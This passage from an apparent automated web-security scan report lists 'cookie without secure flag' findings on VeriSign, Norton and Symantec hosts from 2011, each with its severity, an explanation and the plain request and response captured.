HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:49 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5905 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales U...[SNIP]...
6.3. https://admin.instantservice.com/links/5851/16144
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://admin.instantservice.com
Path:
/links/5851/16144
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/16144 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:50 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5858 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales A...[SNIP]...
6.4. https://admin.instantservice.com/links/5851/16145
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://admin.instantservice.com
Path:
/links/5851/16145
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/16145 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:50 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5853 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales A...[SNIP]...
6.5. https://admin.instantservice.com/links/5851/39897
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://admin.instantservice.com
Path:
/links/5851/39897
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/5851/39897 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:50 GMT Server: Apache Pragma: no-cache Cache-Control: no-cacheSet-Cookie: JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 5946 Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>VRSN Sales U...[SNIP]...
6.6. https://onlinefamily.norton.com/familysafety/loginStart.fs
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://onlinefamily.norton.com
Path:
/familysafety/loginStart.fs
Issue detail
The following cookies were issued by the application and do not have the secure flag set:JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety formVersion=1315604755623; Path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /familysafety/loginStart.fs?inid=us_2010June_NOF HTTP/1.1 Host: onlinefamily.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:45:55 GMT Server: Apache Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:55 GMT; Path=/ Set-Cookie: formVersion=1315604755623; Path=/Set-Cookie: JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety Cache-Control: no-cache,no-store,must-revalidate,max-stale=0 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Connection: close Vary: Accept-Encoding Content-Length: 37906 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <...[SNIP]...
6.7. https://securitycenter.verisign.com/celp/enroll/outsideSearch
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/outsideSearch
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /celp/enroll/outsideSearch HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:33 GMT Content-length: 408 Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMTSet-Cookie: JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/ Accept-Ranges: bytes Connection: close <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
6.8. https://securitycenter.verisign.com/celp/enroll/retail
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/retail
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:43:53 GMT Content-length: 408 Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMTSet-Cookie: JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/ Accept-Ranges: bytes <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
6.9. https://securitycenter.verisign.com/celp/enroll/upsell
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/upsell
Issue detail
The following cookie was issued by the application and does not have the secure flag set:JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /celp/enroll/upsell?application_locale=VRSN_US&originator=VeriSign:CELP&bundle_id=MSIECS002 HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:27:18 GMT Content-type: text/html;charset=UTF-8 Location: https://securitycenter.verisign.com/celp/enroll/retailSet-Cookie: JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/ Content-Length: 303 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://securitycenter.verisign.co...[SNIP]...
6.10. https://onlinefamily.norton.com/familysafety/basicpremium.fs
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://onlinefamily.norton.com
Path:
/familysafety/basicpremium.fs
Issue detail
The following cookie was issued by the application and does not have the secure flag set:formVersion=1315604730862; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /familysafety/basicpremium.fs HTTP/1.1 Host: onlinefamily.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:45:30 GMT Server: Apache Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:30 GMT; Path=/Set-Cookie: formVersion=1315604730862; Path=/ Cache-Control: no-cache,no-store,must-revalidate,max-stale=0 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Connection: close Vary: Accept-Encoding Content-Length: 41316 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>Web Moni...[SNIP]...
6.11. https://renewals.symantec.com/renewals/application
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/application
Issue detail
The following cookie was issued by the application and does not have the secure flag set:entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:50 GMT Content-Type: text/html; charset=utf-8Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store Content-Length: 21436 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <!-- BEGIN ...[SNIP]...
6.12. https://ssl-certificate-center.verisign.ch/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:42 GMT Server: ApacheSet-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
6.13. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.ch
Path:
/process/retail/production_trial_initial
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:42 GMT Server: ApacheSet-Cookie: TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.ch/process/retail/production_trial_product_selector?uid=fb69022a800687aee2281387e3be2beb&product=GHAPT001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
6.14. https://ssl-certificate-center.verisign.com/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:43 GMT Server: ApacheSet-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11759 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
6.15. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/production_trial_initial
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/production_trial_initial HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:44 GMT Server: ApacheSet-Cookie: TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.com/process/retail/production_trial_product_selector?uid=21e134a09c6b802996d1066fe9c13ef5&product=GSPT001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
6.16. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/trustseal_trial_initial
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trustseal_trial_initial HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:45 GMT Server: ApacheSet-Cookie: TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_new_account?uid=9e535ad90e202dd2be1657e6ee2caf70&product=TRUSTSEALTRIAL Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
6.17. https://trust-center.verisign.ch/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:46 GMT Server: ApacheSet-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11715 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
6.18. https://trust-center.verisign.ch/process/retail/trust_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/trust_initial
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_initial HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:46 GMT Server: ApacheSet-Cookie: TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.ch/process/retail/trust_product_selector?uid=2f451e38320cb4cf9a868171c06fe1c9&product=TRUSTSEAL001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
6.19. https://trust-center.verisign.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/favicon.ico
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:45 GMT Server: ApacheSet-Cookie: TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 4710 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/x-icon ...... ..........F... ......................h...............(...>...(... ...@....................................... ................. !....)...9.'&'.(*&.)*(.44-.=?8.BC?...U...]...a. d...i. .h......[SNIP]...
6.20. https://trust-center.verisign.com/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:48 GMT Server: ApacheSet-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12062 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
6.21. https://trust-center.verisign.com/process/retail/help_and_support
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/help_and_support
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/help_and_support HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:53 GMT Server: ApacheSet-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 138732 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
6.22. https://trust-center.verisign.com/process/retail/redirect
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/redirect
Issue detail
